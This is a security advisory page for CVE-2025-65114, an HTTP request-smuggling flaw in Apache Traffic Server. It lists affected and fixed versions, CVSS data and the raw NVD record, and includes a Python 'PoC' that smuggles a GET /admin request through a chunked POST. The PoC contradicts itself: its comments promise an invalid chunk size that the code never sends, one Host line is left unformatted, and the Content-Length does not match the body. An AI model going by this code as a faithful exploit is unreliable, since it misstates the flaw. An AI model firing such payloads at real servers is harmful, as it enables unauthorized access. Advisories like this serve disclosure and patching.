Security Vulnerability Report
中文
CVE-2025-65114 CVSS 7.5 HIGH

CVE-2025-65114

Published: 2026-04-02 17:16:21
Last Modified: 2026-04-06 16:05:24
Source: [email protected]

Description

Apache Traffic Server allows request smuggling if chunked messages are malformed.  This issue affects Apache Traffic Server: from 9.0.0 through 9.2.12, from 10.0.0 through 10.1.1. Users are recommended to upgrade to version 9.2.13 or 10.1.2, which fix the issue.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:traffic_server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:apache:traffic_server:*:*:*:*:*:*:*:* - VULNERABLE
Apache Traffic Server 9.0.0 through 9.2.12
Apache Traffic Server 10.0.0 through 10.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket # Target configuration TARGET_HOST = "example.com" TARGET_PORT = 80 def send_smuggling_payload(): """ Conceptual PoC for HTTP Request Smuggling via malformed chunked encoding. This script sends a request with an invalid chunk size to test the vulnerability. """ # Constructing a malformed chunked request # Using an invalid chunk size (e.g., '1x' instead of hex) or hidden spaces payload = ( "POST / HTTP/1.1\r\n" f"Host: {TARGET_HOST}\r\n" "User-Agent: PoC-Client\r\n" "Content-Length: 30\r\n" "Transfer-Encoding: chunked\r\n" "\r\n" "5\r\n" # Valid chunk size "Hello\r\n" # Chunk data "0\r\n" # Termination "\r\n" "GET /admin HTTP/1.1\r\n" # Smuggled request part "Host: {TARGET_HOST}\r\n\r\n" ) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET_HOST, TARGET_PORT)) s.send(payload.encode()) response = s.recv(4096) print("Response received:") print(response.decode()) s.close() except Exception as e: print(f"Error occurred: {e}") if __name__ == "__main__": send_smuggling_payload()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65114", "sourceIdentifier": "[email protected]", "published": "2026-04-02T17:16:21.087", "lastModified": "2026-04-06T16:05:24.443", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Apache Traffic Server allows request smuggling if chunked messages are malformed. \n\nThis issue affects Apache Traffic Server: from 9.0.0 through 9.2.12, from 10.0.0 through 10.1.1.\n\nUsers are recommended to upgrade to version 9.2.13 or 10.1.2, which fix the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-444"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:traffic_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.2.13", "matchCriteriaId": "361CCF7A-CB22-4074-A902-779476856482"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:traffic_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "10.1.2", "matchCriteriaId": "CA23F0DC-E368-4327-87A1-A0DCD8553AFF"}]}]}], "references": [{"url": "https://lists.apache.org/thread/2s11roxlv1j8ph6q52rqo1klvl01n14q", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.